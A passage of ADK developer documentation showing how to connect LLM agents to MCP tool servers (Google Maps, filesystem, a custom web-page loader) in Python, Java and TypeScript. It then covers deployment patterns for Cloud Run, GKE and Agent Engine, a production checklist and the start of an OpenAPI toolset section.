# Example: export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_KEY" google_maps_api_key = os.environ.get("GOOGLE_MAPS_API_KEY") if not google_maps_api_key: # Fallback or direct assignment for testing - NOT RECOMMENDED FOR PRODUCTION google_maps_api_key = "YOUR_GOOGLE_MAPS_API_KEY_HERE" # Replace if not using env var if google_maps_api_key == "YOUR_GOOGLE_MAPS_API_KEY_HERE": print("WARNING: GOOGLE_MAPS_API_KEY is not set. Please set it as an environment variable or in the script.") # You might want to raise an error or exit if the key is crucial and not found. root_agent = LlmAgent( model='gemini-2.0-flash', name='maps_assistant_agent', instruction='Help the user with mapping, directions, and finding places using Google Maps tools.', tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command='npx', args=[ "-y", "@modelcontextprotocol/server-google-maps", ], # Pass the API key as an environment variable to the npx process # This is how the MCP server for Google Maps expects the key. env={ "GOOGLE_MAPS_API_KEY": google_maps_api_key } ), ), # You can filter for specific Maps tools if needed: # tool_filter=['get_directions', 'find_place_by_id'] ) ], ) ``` #### Step 3: Ensure `__init__.py` Exists If you created this in Example 1, you can skip this. Otherwise, ensure you have an `__init__.py` in the `./adk_agent_samples/mcp_agent/` directory: ```python # ./adk_agent_samples/mcp_agent/__init__.py from . import agent ``` #### Step 4: Run `adk web` and Interact 1. **Set Environment Variable (Recommended):** Before running `adk web`, it's best to set your Google Maps API key as an environment variable in your terminal: ```shell export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_GOOGLE_MAPS_API_KEY" ``` Replace `YOUR_ACTUAL_GOOGLE_MAPS_API_KEY` with your key. 1. **Run `adk web`**: Navigate to the parent directory of `mcp_agent` (e.g., `adk_agent_samples`) and run: ```shell cd ./adk_agent_samples # Or your equivalent parent directory adk web ``` 1. 
**Interact in the UI**: - Select the `maps_assistant_agent`. - Try prompts like: - "Get directions from GooglePlex to SFO." - "Find coffee shops near Golden Gate Park." - "What's the route from Paris, France to Berlin, Germany?" You should see the agent use the Google Maps MCP tools to provide directions or location-based information. For Java, refer to the following sample to define an agent that initializes the `McpToolset`: ```java package agents; import com.google.adk.JsonBaseModel; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.RunConfig; import com.google.adk.runner.InMemoryRunner; import com.google.adk.tools.mcp.McpTool; import com.google.adk.tools.mcp.McpToolset; import com.google.adk.tools.mcp.McpToolset.McpToolsAndToolsetResult; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.modelcontextprotocol.client.transport.ServerParameters; import java.util.List; import java.util.Map; import java.util.Collections; import java.util.HashMap; import java.util.concurrent.CompletableFuture; import java.util.Arrays; public class MapsAgentCreator { /** * Initializes an McpToolset for Google Maps, retrieves tools, * creates an LlmAgent, sends a map-related prompt, and closes the toolset. * @param args Command line arguments (not used). */ public static void main(String[] args) { // TODO: Replace with your actual Google Maps API key, on a project with the Places API enabled. 
        String googleMapsApiKey = "YOUR_GOOGLE_MAPS_API_KEY";

        Map<String, String> envVariables = new HashMap<>();
        envVariables.put("GOOGLE_MAPS_API_KEY", googleMapsApiKey);

        ServerParameters connectionParams = ServerParameters.builder("npx")
            .args(List.of(
                "-y",
                "@modelcontextprotocol/server-google-maps"
            ))
            .env(Collections.unmodifiableMap(envVariables))
            .build();

        try {
            CompletableFuture<McpToolsAndToolsetResult> futureResult =
                McpToolset.fromServer(connectionParams, JsonBaseModel.getMapper());

            McpToolsAndToolsetResult result = futureResult.join();

            try (McpToolset toolset = result.getToolset()) {
                List<McpTool> tools = result.getTools();

                LlmAgent agent = LlmAgent.builder()
                    .model("gemini-2.0-flash")
                    .name("maps_assistant")
                    .description("Maps assistant")
                    .instruction("Help user with mapping and directions using available tools.")
                    .tools(tools)
                    .build();

                System.out.println("Agent created: " + agent.name());

                InMemoryRunner runner = new InMemoryRunner(agent);
                String userId = "maps-user-" + System.currentTimeMillis();
                String sessionId = "maps-session-" + System.currentTimeMillis();
                String promptText = "Please give me directions to the nearest pharmacy to Madison Square Garden.";

                try {
                    runner.sessionService().createSession(runner.appName(), userId, null, sessionId).blockingGet();
                    System.out.println("Session created: " + sessionId + " for user: " + userId);
                } catch (Exception sessionCreationException) {
                    System.err.println("Failed to create session: " + sessionCreationException.getMessage());
                    sessionCreationException.printStackTrace();
                    return;
                }

                // The original sample omitted the semicolon on the next statement.
                Content promptContent = Content.fromParts(Part.fromText(promptText));

                System.out.println("\nSending prompt: \"" + promptText + "\" to agent...\n");

                runner.runAsync(userId, sessionId, promptContent, RunConfig.builder().build())
                    .blockingForEach(event -> {
                        System.out.println("Event received: " + event.toJson());
                    });
            }
        } catch (Exception e) {
            System.err.println("An error occurred: " + e.getMessage());
            e.printStackTrace();
        }
    }
}
```

A successful response will look like this:

```shell
Event
received: {"id":"1a4deb46-c496-4158-bd41-72702c773368","invocationId":"e-48994aa0-531c-47be-8c57-65215c3e0319","author":"maps_assistant","content":{"parts":[{"text":"OK. I see a few options. The closest one is CVS Pharmacy at 5 Pennsylvania Plaza, New York, NY 10001, United States. Would you like directions?\n"}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747380026642} ``` For TypeScript, refer to the following sample to define an agent that initializes the `MCPToolset`: ```typescript import 'dotenv/config'; import {LlmAgent, MCPToolset} from "@google/adk"; // Retrieve the API key from an environment variable. // Ensure this environment variable is set in the terminal where you run 'adk web'. // Example: export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_KEY" const googleMapsApiKey = process.env.GOOGLE_MAPS_API_KEY; if (!googleMapsApiKey) { throw new Error('GOOGLE_MAPS_API_KEY is not provided, please run "export GOOGLE_MAPS_API_KEY=YOUR_ACTUAL_KEY" to add that.'); } export const rootAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "maps_assistant_agent", instruction: "Help the user with mapping, directions, and finding places using Google Maps tools.", tools: [ new MCPToolset( { type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@modelcontextprotocol/server-google-maps", ], // Pass the API key as an environment variable to the npx process // This is how the MCP server for Google Maps expects the key. env: { "GOOGLE_MAPS_API_KEY": googleMapsApiKey } }, }, // You can filter for specific Maps tools if needed: // ['get_directions', 'find_place_by_id'] ) ], }); ``` A successful response will look like this: ```shell Event received: {"id":"1a4deb46-c496-4158-bd41-72702c773368","invocationId":"e-48994aa0-531c-47be-8c57-65215c3e0319","author":"maps_assistant","content":{"parts":[{"text":"OK. I see a few options. 
The closest one is CVS Pharmacy at 5 Pennsylvania Plaza, New York, NY 10001, United States. Would you like directions?\n"}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747380026642} ``` ## 2. Building an MCP server with ADK tools (MCP server exposing ADK) This pattern allows you to wrap existing ADK tools and make them available to any standard MCP client application. The example in this section exposes the ADK `load_web_page` tool through a custom-built MCP server. ### Summary of steps You will create a standard Python MCP server application using the `mcp` library. Within this server, you will: 1. Instantiate the ADK tool(s) you want to expose (e.g., `FunctionTool(load_web_page)`). 1. Implement the MCP server's `@app.list_tools()` handler to advertise the ADK tool(s). This involves converting the ADK tool definition to the MCP schema using the `adk_to_mcp_tool_type` utility from `google.adk.tools.mcp_tool.conversion_utils`. 1. Implement the MCP server's `@app.call_tool()` handler. This handler will: - Receive tool call requests from MCP clients. - Identify if the request targets one of your wrapped ADK tools. - Execute the ADK tool's `.run_async()` method. - Format the ADK tool's result into an MCP-compliant response (e.g., `mcp.types.TextContent`). ### Prerequisites Install the MCP server library in the same Python environment as your ADK installation: ```shell pip install mcp ``` ### Step 1: Create the MCP Server Script Create a new Python file for your MCP server, for example, `my_adk_mcp_server.py`. ### Step 2: Implement the Server Logic Add the following code to `my_adk_mcp_server.py`. This script sets up an MCP server that exposes the ADK `load_web_page` tool. 
```python # my_adk_mcp_server.py import asyncio import json import os from dotenv import load_dotenv # MCP Server Imports from mcp import types as mcp_types # Use alias to avoid conflict from mcp.server.lowlevel import Server, NotificationOptions from mcp.server.models import InitializationOptions import mcp.server.stdio # For running as a stdio server # ADK Tool Imports from google.adk.tools.function_tool import FunctionTool from google.adk.tools.load_web_page import load_web_page # Example ADK tool # ADK <-> MCP Conversion Utility from google.adk.tools.mcp_tool.conversion_utils import adk_to_mcp_tool_type # --- Load Environment Variables (If ADK tools need them, e.g., API keys) --- load_dotenv() # Create a .env file in the same directory if needed # --- Prepare the ADK Tool --- # Instantiate the ADK tool you want to expose. # This tool will be wrapped and called by the MCP server. print("Initializing ADK load_web_page tool...") adk_tool_to_expose = FunctionTool(load_web_page) print(f"ADK tool '{adk_tool_to_expose.name}' initialized and ready to be exposed via MCP.") # --- End ADK Tool Prep --- # --- MCP Server Setup --- print("Creating MCP Server instance...") # Create a named MCP Server instance using the mcp.server library app = Server("adk-tool-exposing-mcp-server") # Implement the MCP server's handler to list available tools @app.list_tools() async def list_mcp_tools() -> list[mcp_types.Tool]: """MCP handler to list tools this server exposes.""" print("MCP Server: Received list_tools request.") # Convert the ADK tool's definition to the MCP Tool schema format mcp_tool_schema = adk_to_mcp_tool_type(adk_tool_to_expose) print(f"MCP Server: Advertising tool: {mcp_tool_schema.name}") return [mcp_tool_schema] # Implement the MCP server's handler to execute a tool call @app.call_tool() async def call_mcp_tool( name: str, arguments: dict ) -> list[mcp_types.Content]: # MCP uses mcp_types.Content """MCP handler to execute a tool call requested by an MCP client.""" 
print(f"MCP Server: Received call_tool request for '{name}' with args: {arguments}") # Check if the requested tool name matches our wrapped ADK tool if name == adk_tool_to_expose.name: try: # Execute the ADK tool's run_async method. # Note: tool_context is None here because this MCP server is # running the ADK tool outside of a full ADK Runner invocation. # If the ADK tool requires ToolContext features (like state or auth), # this direct invocation might need more sophisticated handling. adk_tool_response = await adk_tool_to_expose.run_async( args=arguments, tool_context=None, ) print(f"MCP Server: ADK tool '{name}' executed. Response: {adk_tool_response}") # Format the ADK tool's response (often a dict) into an MCP-compliant format. # Here, we serialize the response dictionary as a JSON string within TextContent. # Adjust formatting based on the ADK tool's output and client needs. response_text = json.dumps(adk_tool_response, indent=2) # MCP expects a list of mcp_types.Content parts return [mcp_types.TextContent(type="text", text=response_text)] except Exception as e: print(f"MCP Server: Error executing ADK tool '{name}': {e}") # Return an error message in MCP format error_text = json.dumps({"error": f"Failed to execute tool '{name}': {str(e)}"}) return [mcp_types.TextContent(type="text", text=error_text)] else: # Handle calls to unknown tools print(f"MCP Server: Tool '{name}' not found/exposed by this server.") error_text = json.dumps({"error": f"Tool '{name}' not implemented by this server."}) return [mcp_types.TextContent(type="text", text=error_text)] # --- MCP Server Runner --- async def run_mcp_stdio_server(): """Runs the MCP server, listening for connections over standard input/output.""" # Use the stdio_server context manager from the mcp.server.stdio library async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): print("MCP Stdio Server: Starting handshake with client...") await app.run( read_stream, write_stream, InitializationOptions( 
                server_name=app.name, # Use the server name defined above
                server_version="0.1.0",
                capabilities=app.get_capabilities(
                    # Define server capabilities - consult MCP docs for options
                    notification_options=NotificationOptions(),
                    experimental_capabilities={},
                ),
            ),
        )
        print("MCP Stdio Server: Run loop finished or client disconnected.")

if __name__ == "__main__":
    print("Launching MCP Server to expose ADK tools via stdio...")
    try:
        asyncio.run(run_mcp_stdio_server())
    except KeyboardInterrupt:
        print("\nMCP Server (stdio) stopped by user.")
    except Exception as e:
        print(f"MCP Server (stdio) encountered an error: {e}")
    finally:
        print("MCP Server (stdio) process exiting.")
# --- End MCP Server ---
```

### Step 3: Test your Custom MCP Server with an ADK Agent

Now, create an ADK agent that will act as a client to the MCP server you just built. This ADK agent will use `McpToolset` to connect to your `my_adk_mcp_server.py` script.

Create an `agent.py` (e.g., in `./adk_agent_samples/mcp_client_agent/agent.py`):

```python
# ./adk_agent_samples/mcp_client_agent/agent.py
import os
from google.adk.agents import LlmAgent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

# IMPORTANT: Replace this with the ABSOLUTE path to your my_adk_mcp_server.py script
PATH_TO_YOUR_MCP_SERVER_SCRIPT = "/path/to/your/my_adk_mcp_server.py" # <<< REPLACE

if PATH_TO_YOUR_MCP_SERVER_SCRIPT == "/path/to/your/my_adk_mcp_server.py":
    print("WARNING: PATH_TO_YOUR_MCP_SERVER_SCRIPT is not set. Please update it in agent.py.")
    # Optionally, raise an error if the path is critical

root_agent = LlmAgent(
    model='gemini-2.0-flash',
    name='web_reader_mcp_client_agent',
    instruction="Use the 'load_web_page' tool to fetch content from a URL provided by the user.",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params = StdioServerParameters(
                    command='python3', # Command to run your MCP server script
                    args=[PATH_TO_YOUR_MCP_SERVER_SCRIPT], # Argument is the path to the script
                )
            )
            # tool_filter=['load_web_page'] # Optional: ensure only specific tools are loaded
        )
    ],
)
```

And an `__init__.py` in the same directory:

```python
# ./adk_agent_samples/mcp_client_agent/__init__.py
from . import agent
```

**To run the test:**

1. **Start your custom MCP server (optional, for separate observation):** You can run your `my_adk_mcp_server.py` directly in one terminal to check that it starts and to see its startup logs:

   ```shell
   python3 /path/to/your/my_adk_mcp_server.py
   ```

   It will print "Launching MCP Server..." and wait for a client. The ADK agent (run via `adk web`) does not attach to this process: with `StdioConnectionParams`, `McpToolset` starts the script named in `command` and `args` as its own subprocess when the agent initializes.

1. **Run `adk web` for the client agent:** Navigate to the parent directory of `mcp_client_agent` (e.g., `adk_agent_samples`) and run:

   ```shell
   cd ./adk_agent_samples # Or your equivalent parent directory
   adk web
   ```

1. **Interact in the ADK Web UI:**

   - Select the `web_reader_mcp_client_agent`.
   - Try a prompt like: "Load the content from https://example.com"

   The ADK agent (`web_reader_mcp_client_agent`) will use `McpToolset` to start and connect to your `my_adk_mcp_server.py`. Your MCP server will receive the `call_tool` request, execute the ADK `load_web_page` tool, and return the result. The ADK agent will then relay this information.
You should see logs in the ADK Web UI and in the terminal running `adk web`.

This example demonstrates how ADK tools can be encapsulated within an MCP server, making them accessible to a broader range of MCP-compliant clients, not just ADK agents.

To try it out with Claude Desktop, refer to the [MCP documentation](https://modelcontextprotocol.io/quickstart/server#core-mcp-concepts).

## Using MCP Tools in your own Agent outside of `adk web`

This section is relevant to you if:

- You are developing your own agent using ADK,
- you are **NOT** using `adk web`, and
- you are exposing the agent via your own UI.

Using MCP tools requires a different setup than using regular tools, because the specs for MCP tools are fetched asynchronously from an MCP server running remotely or in another process.

The following example is modified from "Example 1: File System MCP Server" above. The main differences are:

1. Your tool and agent are created asynchronously.
1. You need to properly manage the exit stack, so that your agents and tools are cleaned up when the connection to the MCP server is closed.
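
The cleanup requirement in the second point can be sketched with the standard library alone. The snippet below is a minimal illustration, not ADK code: `FakeToolset` and `run_with_cleanup` are hypothetical names, and `FakeToolset` only stands in for an object that, like a toolset, owns a connection and exposes an async `close()` method. It registers `close()` on a `contextlib.AsyncExitStack`, so the cleanup runs when the block exits, even if the agent code raises.

```python
import asyncio
from contextlib import AsyncExitStack


class FakeToolset:
    """Hypothetical stand-in for a toolset that owns a server connection."""

    def __init__(self) -> None:
        self.closed = False

    async def close(self) -> None:
        # A real toolset would shut down its MCP session or subprocess here.
        self.closed = True


async def run_with_cleanup() -> FakeToolset:
    toolset = FakeToolset()
    async with AsyncExitStack() as stack:
        # Register cleanup first so it still runs if the code below raises.
        stack.push_async_callback(toolset.close)
        # ... build the agent and run it here ...
        await asyncio.sleep(0)
    # Leaving the `async with` block has awaited toolset.close().
    return toolset


if __name__ == "__main__":
    finished = asyncio.run(run_with_cleanup())
    print(f"toolset closed: {finished.closed}")
```

Running the script prints `toolset closed: True`. The ADK example that follows ends the same way, by awaiting `toolset.close()` once the run completes.
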
```python
# agent.py (modify get_agent_async and other parts as needed)
# ./adk_agent_samples/mcp_agent/agent.py
import os
import asyncio
from dotenv import load_dotenv
from google.genai import types
from google.adk.agents.llm_agent import LlmAgent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService # Optional
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

# Load environment variables from .env file in the parent directory
# Place this near the top, before using env vars like API keys
load_dotenv('../.env')

# Ensure TARGET_FOLDER_PATH is an absolute path for the MCP server.
# The folder is resolved relative to this file. Do not start the second argument
# with '/': os.path.join would then discard the script directory entirely.
TARGET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "path/to/your/folder")

# --- Step 1: Agent Definition ---
async def get_agent_async():
    """Creates an ADK Agent equipped with tools from the MCP Server."""
    toolset = McpToolset(
        # Use StdioConnectionParams for local process communication
        connection_params=StdioConnectionParams(
            server_params = StdioServerParameters(
                command='npx', # Command to run the server
                args=["-y", # Arguments for the command
                      "@modelcontextprotocol/server-filesystem",
                      TARGET_FOLDER_PATH],
            ),
        ),
        tool_filter=['read_file', 'list_directory'] # Optional: filter specific tools
        # For remote servers, you would use SseConnectionParams instead:
        # connection_params=SseConnectionParams(url="http://remote-server:port/path", headers={...})
    )

    # Use in an agent
    root_agent = LlmAgent(
        model='gemini-2.0-flash', # Adjust model name if needed based on availability
        name='enterprise_assistant',
        instruction='Help user accessing their file systems',
        tools=[toolset], # Provide the MCP tools to the ADK agent
    )
    return root_agent, toolset

# --- Step 2: Main Execution Logic ---
async def async_main():
    session_service = InMemorySessionService()
    # Artifact service might not be needed for this example
    artifacts_service = InMemoryArtifactService()

    session = await session_service.create_session(
        state={}, app_name='mcp_filesystem_app', user_id='user_fs'
    )

    # TODO: Change the query to be relevant to YOUR specified folder.
    # e.g., "list files in the 'documents' subfolder" or "read the file 'notes.txt'"
    query = "list files in the tests folder"
    print(f"User Query: '{query}'")
    content = types.Content(role='user', parts=[types.Part(text=query)])

    root_agent, toolset = await get_agent_async()

    runner = Runner(
        app_name='mcp_filesystem_app',
        agent=root_agent,
        artifact_service=artifacts_service, # Optional
        session_service=session_service,
    )

    print("Running agent...")
    events_async = runner.run_async(
        session_id=session.id, user_id=session.user_id, new_message=content
    )

    async for event in events_async:
        print(f"Event received: {event}")

    # Cleanup is handled automatically by the agent framework
    # But you can also manually close if needed:
    print("Closing MCP server connection...")
    await toolset.close()
    print("Cleanup complete.")

if __name__ == '__main__':
    try:
        asyncio.run(async_main())
    except Exception as e:
        print(f"An error occurred: {e}")
```

## Key considerations

When working with MCP and ADK, keep these points in mind:

- **Protocol vs. Library:** MCP is a protocol specification, defining communication rules. ADK is a library/framework for building agents. `McpToolset` bridges these by implementing the client side of the MCP protocol within the ADK framework. Conversely, building an MCP server in Python requires the MCP Python SDK (the `mcp` package installed earlier with `pip install mcp`).
- **ADK Tools vs. MCP Tools:**
  - ADK Tools (`BaseTool`, `FunctionTool`, `AgentTool`, etc.) are Python objects designed for direct use within the ADK's `LlmAgent` and `Runner`.
  - MCP Tools are capabilities exposed by an MCP Server according to the protocol's schema. `McpToolset` makes these look like ADK tools to an `LlmAgent`.
- **Asynchronous nature:** Both ADK and the MCP Python library are heavily based on the asyncio Python library. Tool implementations and server handlers should generally be async functions. - **Stateful sessions (MCP):** MCP establishes stateful, persistent connections between a client and server instance. This differs from typical stateless REST APIs. - **Deployment:** This statefulness can pose challenges for scaling and deployment, especially for remote servers handling many users. The original MCP design often assumed client and server were co-located. Managing these persistent connections requires careful infrastructure considerations (e.g., load balancing, session affinity). - **ADK McpToolset:** Manages this connection lifecycle. The exit_stack pattern shown in the examples is crucial for ensuring the connection (and potentially the server process) is properly terminated when the ADK agent finishes. ## Deploying Agents with MCP Tools When deploying ADK agents that use MCP tools to production environments like Cloud Run, GKE, or Vertex AI Agent Engine, you need to consider how MCP connections will work in containerized and distributed environments. ### Critical Deployment Requirement: Synchronous Agent Definition **⚠️ Important:** When deploying agents with MCP tools, the agent and its McpToolset must be defined **synchronously** in your `agent.py` file. While `adk web` allows for asynchronous agent creation, deployment environments require synchronous instantiation. ```python # ✅ CORRECT: Synchronous agent definition for deployment import os from google.adk.agents.llm_agent import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters _allowed_path = os.path.dirname(os.path.abspath(__file__)) root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction=f'Help user accessing their file systems. 
Allowed directory: {_allowed_path}', tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=['-y', '@modelcontextprotocol/server-filesystem', _allowed_path], ), timeout=5, # Configure appropriate timeouts ), # Filter tools for security in production tool_filter=[ 'read_file', 'read_multiple_files', 'list_directory', 'directory_tree', 'search_files', 'get_file_info', 'list_allowed_directories', ], ) ], ) ``` ```python # ❌ WRONG: Asynchronous patterns don't work in deployment async def get_agent(): # This won't work for deployment toolset = await create_mcp_toolset_async() return LlmAgent(tools=[toolset]) ``` ### Quick Deployment Commands #### Vertex AI Agent Engine ```bash uv run adk deploy agent_engine \ --project= \ --region= \ --staging_bucket="gs://" \ --display_name="My MCP Agent" \ ./path/to/your/agent_directory ``` #### Cloud Run ```bash uv run adk deploy cloud_run \ --project= \ --region= \ --service_name= \ ./path/to/your/agent_directory ``` ### Deployment Patterns #### Pattern 1: Self-Contained Stdio MCP Servers For MCP servers that can be packaged as npm packages or Python modules (like `@modelcontextprotocol/server-filesystem`), you can include them directly in your agent container: **Container Requirements:** ```dockerfile # Example for npm-based MCP servers FROM python:3.13-slim # Install Node.js and npm for MCP servers RUN apt-get update && apt-get install -y nodejs npm && rm -rf /var/lib/apt/lists/* # Install your Python dependencies COPY requirements.txt . RUN pip install -r requirements.txt # Copy your agent code COPY . . 
# Your agent can now use StdioConnectionParams with 'npx' commands CMD ["python", "main.py"] ``` **Agent Configuration:** ```python # This works in containers because npx and the MCP server run in the same environment McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/app/data"], ), ), ) ``` #### Pattern 2: Remote MCP Servers (Streamable HTTP) For production deployments requiring scalability, deploy MCP servers as separate services and connect via Streamable HTTP: **MCP Server Deployment (Cloud Run):** ```python # deploy_mcp_server.py - Separate Cloud Run service using Streamable HTTP import contextlib import logging from collections.abc import AsyncIterator from typing import Any import anyio import click import mcp.types as types from mcp.server.lowlevel import Server from mcp.server.streamable_http_manager import StreamableHTTPSessionManager from starlette.applications import Starlette from starlette.routing import Mount from starlette.types import Receive, Scope, Send logger = logging.getLogger(__name__) def create_mcp_server(): """Create and configure the MCP server.""" app = Server("adk-mcp-streamable-server") @app.call_tool() async def call_tool(name: str, arguments: dict[str, Any]) -> list[types.ContentBlock]: """Handle tool calls from MCP clients.""" # Example tool implementation - replace with your actual ADK tools if name == "example_tool": result = arguments.get("input", "No input provided") return [ types.TextContent( type="text", text=f"Processed: {result}" ) ] else: raise ValueError(f"Unknown tool: {name}") @app.list_tools() async def list_tools() -> list[types.Tool]: """List available tools.""" return [ types.Tool( name="example_tool", description="Example tool for demonstration", inputSchema={ "type": "object", "properties": { "input": { "type": "string", "description": "Input text to process" } }, "required": ["input"] } ) ] return app 
def main(port: int = 8080, json_response: bool = False): """Main server function.""" logging.basicConfig(level=logging.INFO) app = create_mcp_server() # Create session manager with stateless mode for scalability session_manager = StreamableHTTPSessionManager( app=app, event_store=None, json_response=json_response, stateless=True, # Important for Cloud Run scalability ) async def handle_streamable_http(scope: Scope, receive: Receive, send: Send) -> None: await session_manager.handle_request(scope, receive, send) @contextlib.asynccontextmanager async def lifespan(app: Starlette) -> AsyncIterator[None]: """Manage session manager lifecycle.""" async with session_manager.run(): logger.info("MCP Streamable HTTP server started!") try: yield finally: logger.info("MCP server shutting down...") # Create ASGI application starlette_app = Starlette( debug=False, # Set to False for production routes=[ Mount("/mcp", app=handle_streamable_http), ], lifespan=lifespan, ) import uvicorn uvicorn.run(starlette_app, host="0.0.0.0", port=port) if __name__ == "__main__": main() ``` **Agent Configuration for Remote MCP:** ```python # Your ADK agent connects to the remote MCP service via Streamable HTTP McpToolset( connection_params=StreamableHTTPConnectionParams( url="https://your-mcp-server-url.run.app/mcp", headers={"Authorization": "Bearer your-auth-token"} ), ) ``` #### Pattern 3: Sidecar MCP Servers (GKE) In Kubernetes environments, you can deploy MCP servers as sidecar containers: ```yaml # deployment.yaml - GKE with MCP sidecar apiVersion: apps/v1 kind: Deployment metadata: name: adk-agent-with-mcp spec: template: spec: containers: # Main ADK agent container - name: adk-agent image: your-adk-agent:latest ports: - containerPort: 8080 env: - name: MCP_SERVER_URL value: "http://localhost:8081" # MCP server sidecar - name: mcp-server image: your-mcp-server:latest ports: - containerPort: 8081 ``` ### Connection Management Considerations #### Stdio Connections - **Pros:** Simple setup, 
process isolation, works well in containers - **Cons:** Process overhead, not suitable for high-scale deployments - **Best for:** Development, single-tenant deployments, simple MCP servers #### SSE/HTTP Connections - **Pros:** Network-based, scalable, can handle multiple clients - **Cons:** Requires network infrastructure, authentication complexity - **Best for:** Production deployments, multi-tenant systems, external MCP services ### Production Deployment Checklist When deploying agents with MCP tools to production: **✅ Connection Lifecycle** - Ensure proper cleanup of MCP connections using exit_stack patterns - Configure appropriate timeouts for connection establishment and requests - Implement retry logic for transient connection failures **✅ Resource Management** - Monitor memory usage for stdio MCP servers (each spawns a process) - Configure appropriate CPU/memory limits for MCP server processes - Consider connection pooling for remote MCP servers **✅ Security** - Use authentication headers for remote MCP connections - Restrict network access between ADK agents and MCP servers - **Filter MCP tools using `tool_filter` to limit exposed functionality** - Validate MCP tool inputs to prevent injection attacks - Use restrictive file paths for filesystem MCP servers (e.g., `os.path.dirname(os.path.abspath(__file__))`) - Consider read-only tool filters for production environments **✅ Monitoring & Observability** - Log MCP connection establishment and teardown events - Monitor MCP tool execution times and success rates - Set up alerts for MCP connection failures **✅ Scalability** - For high-volume deployments, prefer remote MCP servers over stdio - Configure session affinity if using stateful MCP servers - Consider MCP server connection limits and implement circuit breakers ### Environment-Specific Configurations #### Cloud Run ```python # Cloud Run environment variables for MCP configuration import os # Detect Cloud Run environment if os.getenv('K_SERVICE'): # Use 
remote MCP servers in Cloud Run mcp_connection = SseConnectionParams( url=os.getenv('MCP_SERVER_URL'), headers={'Authorization': f"Bearer {os.getenv('MCP_AUTH_TOKEN')}"} ) else: # Use stdio for local development mcp_connection = StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/tmp"] ) ) McpToolset(connection_params=mcp_connection) ``` #### GKE ```python # GKE-specific MCP configuration # Use service discovery for MCP servers within the cluster McpToolset( connection_params=SseConnectionParams( url="http://mcp-service.default.svc.cluster.local:8080/sse" ), ) ``` #### Vertex AI Agent Engine ```python # Agent Engine managed deployment # Prefer lightweight, self-contained MCP servers or external services # Note: shell substitutions such as $(gcloud auth print-access-token) are not expanded inside a Python string, so the token is read from the environment (MCP_AUTH_TOKEN, as in the Cloud Run example) import os McpToolset( connection_params=SseConnectionParams( url="https://your-managed-mcp-service.googleapis.com/sse", headers={'Authorization': f"Bearer {os.getenv('MCP_AUTH_TOKEN')}"} ), ) ``` ### Troubleshooting Deployment Issues **Common MCP Deployment Problems:** 1. **Stdio Process Startup Failures** ```python # Debug stdio connection issues McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/app/data"], # Add environment debugging env={'DEBUG': '1'} ), ), ) ``` 1. **Network Connectivity Issues** ```python # Test remote MCP connectivity import aiohttp async def test_mcp_connection(): async with aiohttp.ClientSession() as session: async with session.get('https://your-mcp-server.com/health') as resp: print(f"MCP Server Health: {resp.status}") ``` 1. **Resource Exhaustion** 1. Monitor container memory usage when using stdio MCP servers 1. Set appropriate limits in Kubernetes deployments 1. 
Use remote MCP servers for resource-intensive operations ## Further Resources - [Model Context Protocol Documentation](https://modelcontextprotocol.io/) - [MCP Specification](https://modelcontextprotocol.io/specification/) - [MCP Python SDK & Examples](https://github.com/modelcontextprotocol/) # Integrate REST APIs with OpenAPI Supported in ADK: Python v0.1.0 ADK simplifies interacting with external REST APIs by automatically generating callable tools directly from an [OpenAPI Specification (v3.x)](https://swagger.io/specification/). This eliminates the need to manually define individual function tools for each API endpoint. Core Benefit Use `OpenAPIToolset` to instantly create agent tools (`RestApiTool`) from your existing API documentation (OpenAPI spec), enabling agents to seamlessly call your web services. ## Key Components - **`OpenAPIToolset`**: This is the primary class you'll use. You initialize it with your OpenAPI specification, and it handles the parsing and generation of tools. - **`RestApiTool`**: This class represents a single, callable API operation (like `GET /pets/{petId}` or `POST /pets`). `OpenAPIToolset` creates one `RestApiTool` instance for each operation defined in your spec. ## How it Works The process involves these main steps when you use `OpenAPIToolset`: 1. **Initialization & Parsing**: - You provide the OpenAPI specification to `OpenAPIToolset` either as a Python dictionary, a JSON string, or a YAML string. - The toolset internally parses the spec, resolving any internal references (`$ref`) to understand the complete API structure. 1. **Operation Discovery**: - It identifies all valid API operations (e.g., `GET`, `POST`, `PUT`, `DELETE`) defined within the `paths` object of your specification. 1. **Tool Generation**: - For each discovered operation, `OpenAPIToolset` automatically creates a corresponding `RestApiTool` instance. - **Tool Name**: Derived from the `operationId` in the spec (converted to `snake_case`, max 60 chars). 
